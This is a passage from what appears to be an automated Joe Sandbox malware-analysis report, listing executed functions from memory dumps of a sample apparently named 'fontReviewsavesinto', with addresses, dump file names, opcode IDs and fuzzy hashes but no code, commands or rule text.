                                          Function 00007FFAAC3D1A83 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8463049e667e6657dad827784e0207207bf448f6e768cf86c1fcef73d0852a06
                                          • Instruction ID: 30f1ff5817c31f7d8c14f6b29f20fbd78ee06b14da6347d7a84fe49cddea0c5e
                                          • Opcode Fuzzy Hash: 8463049e667e6657dad827784e0207207bf448f6e768cf86c1fcef73d0852a06
                                          • Instruction Fuzzy Hash: A9C08C81E2CD2A07F25A32248010ABD08025B44350F40C8B1F00EC33C6CC1CAB0202C6
                                          Function 00007FFAAC3D06C8 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.1341437272.00007FFAAC3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3D0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_11_2_7ffaac3d0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e716a5800a6a44958a196e705ceddb1afe1a08bd1bb5953a2accdd5bcfd4e64
                                          • Instruction ID: cb3cfd46db7886ba8ee1c0a8ddeceda4708be9ecf8a7e9c20b5f3afec5d8e762
                                          • Opcode Fuzzy Hash: 1e716a5800a6a44958a196e705ceddb1afe1a08bd1bb5953a2accdd5bcfd4e64
                                          • Instruction Fuzzy Hash: D8B01200C57C0F81B40533BA0846664F0409B46104FC04471E40C80081D84DD09C02F2

                                          Executed Functions

                                          Function 00007FFAAC4F0D48 Relevance: 1.5, Strings: 1, Instructions: 270COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 5[_H
                                          • API String ID: 0-3279724263
                                          • Opcode ID: 78243ce3e280b467929cea8f4ced1ad7c9898ebeee03d35cadaf2a176bbc73dc
                                          • Instruction ID: 193e44aba0c06241b5d9ce70feb6be51c2480feb586e9fa48c6d4b732d5a8b0d
                                          • Opcode Fuzzy Hash: 78243ce3e280b467929cea8f4ced1ad7c9898ebeee03d35cadaf2a176bbc73dc
                                          • Instruction Fuzzy Hash: 2191D2B590DBC98FE745EB6CC8697A87FE1EB96314F0441BBD04ADB3D2CA7818148790
                                          Function 00007FFAAC4F0E43 Relevance: .2, Instructions: 172COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 912e2fcd9439900b8b93595115b01bad774c82ccf12024447b73ea43cb50a979
                                          • Instruction ID: 5410e9ebe6b9e7ed6c1bc5269c254df3220d70bb13b1de0df92059440c5abffb
                                          • Opcode Fuzzy Hash: 912e2fcd9439900b8b93595115b01bad774c82ccf12024447b73ea43cb50a979
                                          • Instruction Fuzzy Hash: F051D0B5A08A898FE748EF2CC8597A97FE1EB96314F5041BEC04ED77D1CAB818158780
                                          Function 00007FFAAC4F090D Relevance: .2, Instructions: 152COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 43c088a1e5e6e26c2179fd847a072e2ea568f11dfbc9909da189a365eb75db66
                                          • Instruction ID: 0d2fb0c5815950b454908124997bb368f1e2bfffc7108b7bbd623e68a284a42f
                                          • Opcode Fuzzy Hash: 43c088a1e5e6e26c2179fd847a072e2ea568f11dfbc9909da189a365eb75db66
                                          • Instruction Fuzzy Hash: 26412A12A4DA564FF305B77CE099AF87BC1EF45325B1484BBD44EC72A3DD18A84182D5
                                          Function 00007FFAAC4F0908 Relevance: .1, Instructions: 118COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7de3e90215e5ef9b36b68d21ee94634a7601b8ade4ea91bb2df532ffec5ec4f4
                                          • Instruction ID: c299a62f1cd2f52593469989c60244f559a69994dd1cf630f0649d40b6440393
                                          • Opcode Fuzzy Hash: 7de3e90215e5ef9b36b68d21ee94634a7601b8ade4ea91bb2df532ffec5ec4f4
                                          • Instruction Fuzzy Hash: 9521F83130DD184FE768EB0CE88DDB973D1EB9A32130141BAE58EC7225E911EC8287C1
                                          Function 00007FFAAC4F0960 Relevance: .1, Instructions: 115COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0612495e0f171d180471ed277aabd2c354034b07a9700b85e4ba033d83bd9e71
                                          • Instruction ID: 029fe28f34a0614fdea3d3d34ff509347289fac8e3fbdbee84275ceb695f0bf0
                                          • Opcode Fuzzy Hash: 0612495e0f171d180471ed277aabd2c354034b07a9700b85e4ba033d83bd9e71
                                          • Instruction Fuzzy Hash: 03310421B0CA1A4FF244B77CE04AAB937C1DF49329B1484BAE40EC32A3DC18AC4142D9
                                          Function 00007FFAAC4F0998 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1d98b7b358f2463119f758b6f605a83a96d4373f1c76695652039a4b05798187
                                          • Instruction ID: b3cc9a94cbd47cbbdb0c80735edd36079a594c65f5e82b068fff08d71ff4cc62
                                          • Opcode Fuzzy Hash: 1d98b7b358f2463119f758b6f605a83a96d4373f1c76695652039a4b05798187
                                          • Instruction Fuzzy Hash: D8210721B1DB594FF788B72CD44EA7936C6EB99715F1080B9E80EC32E2DD28EC4142C5
                                          Function 00007FFAAC4F1171 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e938635d8150330e597db2d785dcf1e4193ec75bd8c6cd395c27b05dadfcb18
                                          • Instruction ID: e86a72a9817336e90cf7ac6521bd0d4050e6ddcfc5c0a036bf6ec4d2988c7084
                                          • Opcode Fuzzy Hash: 3e938635d8150330e597db2d785dcf1e4193ec75bd8c6cd395c27b05dadfcb18
                                          • Instruction Fuzzy Hash: DF31883090D7498FEB46EB64C8599B97FF0EF5B300B0541BBD00ED71A3DA289949C791
                                          Function 00007FFAAC4F0C25 Relevance: .1, Instructions: 85COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2029b7026620fa59ec8e3b80fe06277eb55a02c927ae7235b538d81600f08b28
                                          • Instruction ID: affd21c6f1bd76d9f4cb75ae642fef134298da049dbd04a7d81f7bacc2da00b9
                                          • Opcode Fuzzy Hash: 2029b7026620fa59ec8e3b80fe06277eb55a02c927ae7235b538d81600f08b28
                                          • Instruction Fuzzy Hash: CB21F775A0D385CBF316A768D8150EC3FA0DF82325F1485B2C04D8A293D928994A83D5
                                          Function 00007FFAAC4F6369 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a9d21c1ff809a5ce13968f59c3a2c9064596101c2cddc17c39c07a1f19bae4da
                                          • Instruction ID: b8ae74bc51bbbe562d8b7b906320c16fc324d7d429fc06ca8a08d1867117c7b5
                                          • Opcode Fuzzy Hash: a9d21c1ff809a5ce13968f59c3a2c9064596101c2cddc17c39c07a1f19bae4da
                                          • Instruction Fuzzy Hash: 1921E03490861DCFEB64DB04C854BE9B3A1FB58314F5481ADC04ED7291CE75AD85CF85
                                          Function 00007FFAAC4F0C38 Relevance: .1, Instructions: 57COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf3a4de87310e6193333729f6eab7ed9a4948ade013a8d358eafd3f62495bdda
                                          • Instruction ID: 344f5b196d24db52c66f39d48120b29762fb710d643afe2d2077c8946f47bc6d
                                          • Opcode Fuzzy Hash: bf3a4de87310e6193333729f6eab7ed9a4948ade013a8d358eafd3f62495bdda
                                          • Instruction Fuzzy Hash: 0111E031A0E389CFF706DB68C8651AC7FA0EF82715F0585B6C048DB292E938994987C4
                                          Function 00007FFAAC4F0C40 Relevance: .1, Instructions: 51COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0141fef487c1e175ed7bb489f2a4f232ca1f0b9b7a7e21f0e13ad3df8724c4f3
                                          • Instruction ID: f7050df013d7f0fee04fc471fab7361c8911a6025b9d4a17541c46b21fe04654
                                          • Opcode Fuzzy Hash: 0141fef487c1e175ed7bb489f2a4f232ca1f0b9b7a7e21f0e13ad3df8724c4f3
                                          • Instruction Fuzzy Hash: 3F11ED31A0E389CFF706DB68C8690AC7FB0EF82715F0581F6C048DB292D9389A4987C4
                                          Function 00007FFAAC4F17E0 Relevance: .0, Instructions: 46COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7412e5eefbf3cee4d017896d5c0d663a0b81959352543bc5ee60f2568868076a
                                          • Instruction ID: 4a935a7f06690c0289e42586eb69063ef86c64ade0a4eb59862f75066041acba
                                          • Opcode Fuzzy Hash: 7412e5eefbf3cee4d017896d5c0d663a0b81959352543bc5ee60f2568868076a
                                          • Instruction Fuzzy Hash: F001E121F0960ACBFA54E758C498AB827D2EF96715F058175D40EC72D6DD28EC4547C4
                                          Function 00007FFAAC4F0C48 Relevance: .0, Instructions: 45COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6d5633cbad2ce4c534b23c9c42c6556f6d62d65d91893d3cf12ba034f4a6c525
                                          • Instruction ID: cdc0087eb794fb152faf7c25d67ebe29a197e9af0523de86fffee7a6bad15206
                                          • Opcode Fuzzy Hash: 6d5633cbad2ce4c534b23c9c42c6556f6d62d65d91893d3cf12ba034f4a6c525
                                          • Instruction Fuzzy Hash: 17019E71A0E389CFE706DB64C8650AD7FB0AF83715F1581F6D049DB292E9389A4887C5
                                          Function 00007FFAAC4F179A Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0325a1ae18a3fb8657ff01c7e218e2a46f6257fffb43f1ad919698442902a8c0
                                          • Instruction ID: 86ee87dc1c6c1881fe5eeef58c67702c8c372331fe02cb135874a0271d223172
                                          • Opcode Fuzzy Hash: 0325a1ae18a3fb8657ff01c7e218e2a46f6257fffb43f1ad919698442902a8c0
                                          • Instruction Fuzzy Hash: CB018620D1AB1FCBF7A5E718891C7F855D2BF89B18F5481B5C00ED3192DE28AC4946C8
                                          Function 00007FFAAC4F0C50 Relevance: .0, Instructions: 40COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23df1dbb7cbbf8d7b0c8e5a76fbffbc23e238cb004773292a8a3e080c3ce71bf
                                          • Instruction ID: e8d4d8b69fcbecd957ce2e1a72ac96b795145bca6313f997ac74d540bd7f5078
                                          • Opcode Fuzzy Hash: 23df1dbb7cbbf8d7b0c8e5a76fbffbc23e238cb004773292a8a3e080c3ce71bf
                                          • Instruction Fuzzy Hash: B7017C7090E3C9CFE716DB64C8684AD7FB0AF82705F1481E6D049DB292E9389A4887C5
                                          Function 00007FFAAC4F1855 Relevance: .0, Instructions: 35COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 944d61059a31b9d1bed6d9e5f52998de1cd7260d907c3be5c091df8252c536d2
                                          • Instruction ID: afa5fadb8896ebe00f01c98895097a0f7da598a02079d46a6e2dbfc4e616abbb
                                          • Opcode Fuzzy Hash: 944d61059a31b9d1bed6d9e5f52998de1cd7260d907c3be5c091df8252c536d2
                                          • Instruction Fuzzy Hash: DBF0F431D1960ECBFB55EB04C898AF877A2EF95725F1481B9C40ED7191CE38AD8587C4
                                          Function 00007FFAAC4F1828 Relevance: .0, Instructions: 30COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0de71fa158804eddedc676ebcaec681e313a07634ba3b1218b1e4fc123e68bbd
                                          • Instruction ID: be2c8d400c3684878759b24f03571d6187fe193848238fe466e6a07783b169c7
                                          • Opcode Fuzzy Hash: 0de71fa158804eddedc676ebcaec681e313a07634ba3b1218b1e4fc123e68bbd
                                          • Instruction Fuzzy Hash: 80F05421E0960ACBFB55E704C8886F823A2AF82768F1482B5C40DD72D2CE28ED4946C4
                                          Function 00007FFAAC4F2810 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 365a92b40fae61960c29256a7ed6e6cdfc8762340f1baa663a446c15420b1b07
                                          • Instruction ID: cbffc48ed1a14de141dbf613c2c80a2940a0907249ef64009471f7fb8bd7af0a
                                          • Opcode Fuzzy Hash: 365a92b40fae61960c29256a7ed6e6cdfc8762340f1baa663a446c15420b1b07
                                          • Instruction Fuzzy Hash: 36E01230D0D11ACBF794A714C8597FD6291DF95704F1080B4D50D932C2DD38AE858BC8
                                          Function 00007FFAAC4F6BFD Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 50da1873461d80104cfe354517d7debd443e2d938b7cc394f2ac5dd70f5273ec
                                          • Instruction ID: 06e7593a7caac9ac3b30a25a0a777880abc46973f8071f3f5b30b32d33fd1e9a
                                          • Opcode Fuzzy Hash: 50da1873461d80104cfe354517d7debd443e2d938b7cc394f2ac5dd70f5273ec
                                          • Instruction Fuzzy Hash: 47E01252E5D6458BF798A7A8493A3BC94C19B9AB44F49817DD48EC32C3DC085C4403DA
                                          Function 00007FFAAC4F0B95 Relevance: .0, Instructions: 19COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 10c668cf3558eab0feaac669ddaf96801f5b5ddbe6e33897a242e6e9f1e9bcf0
                                          • Instruction ID: 19691308ad2c5671c016dd3e5353566fb391e6050872bbfc0c44bde017c54dc2
                                          • Opcode Fuzzy Hash: 10c668cf3558eab0feaac669ddaf96801f5b5ddbe6e33897a242e6e9f1e9bcf0
                                          • Instruction Fuzzy Hash: B1D0A73061994E9FE701B77CD8494547BA0EB1F215BC910E1D00CC71A1D50489558740
                                          Function 00007FFAAC4F12B8 Relevance: .0, Instructions: 14COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0ba637a91a6ab8ac21ddc5e4d32457aa27138c0be0db51b66355bf03e48b19e3
                                          • Instruction ID: 801621f0ca7f9d56934aac64f32a84e8219135596e90137337cb371bb597f4c9
                                          • Opcode Fuzzy Hash: 0ba637a91a6ab8ac21ddc5e4d32457aa27138c0be0db51b66355bf03e48b19e3
                                          • Instruction Fuzzy Hash: B3C0123051190C8FDA48EB29C888D1473A0FB1A308B9940D4E00DCB2A1D66AECC6CB85
                                          Function 00007FFAAC4F06A5 Relevance: .0, Instructions: 13COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21db906594d11b7f137e5e5be94e44b845d8a9737c8d5e68687420ea240c9870
                                          • Instruction ID: 330de71b3dc21b6830072500c61df51b5e17a35f8a49194063ecf300371df22e
                                          • Opcode Fuzzy Hash: 21db906594d11b7f137e5e5be94e44b845d8a9737c8d5e68687420ea240c9870
                                          • Instruction Fuzzy Hash: B6C04C05E5B71BC3B415776E584E1BCA9405BD7E1DFE58172D50C800C1AC4DA8DD01DE
                                          Function 00007FFAAC4F1A83 Relevance: .0, Instructions: 10COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c126eeee5b85869faa9e223c1c181fb27355fc7b68f9c251f648b4d1da3ef4ba
                                          • Instruction ID: 2d80717ab55b07a7b2dc00a0abafe8a435d0e942e4759fe1d8a0881729243dae
                                          • Opcode Fuzzy Hash: c126eeee5b85869faa9e223c1c181fb27355fc7b68f9c251f648b4d1da3ef4ba
                                          • Instruction Fuzzy Hash: 00C04C51E1C96A57F1567628C01157D04425B45754F5584B5E00FC73C6CD0C6B0517CA
                                          Function 00007FFAAC4F06C8 Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.3693606157.00007FFAAC4F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC4F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_17_2_7ffaac4f0000_fontReviewsavesinto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1e716a5800a6a44958a196e705ceddb1afe1a08bd1bb5953a2accdd5bcfd4e64
                                          • Instruction ID: 79a28f965c6b047a76e96d951a46a6ee22f22b7439dc935476347855ffd9d9f3
                                          • Opcode Fuzzy Hash: 1e716a5800a6a44958a196e705ceddb1afe1a08bd1bb5953a2accdd5bcfd4e64
                                          • Instruction Fuzzy Hash: 95B01200C5750F82B404337A084A17878805B87508FD04070D80CC0081AC4D949C02DB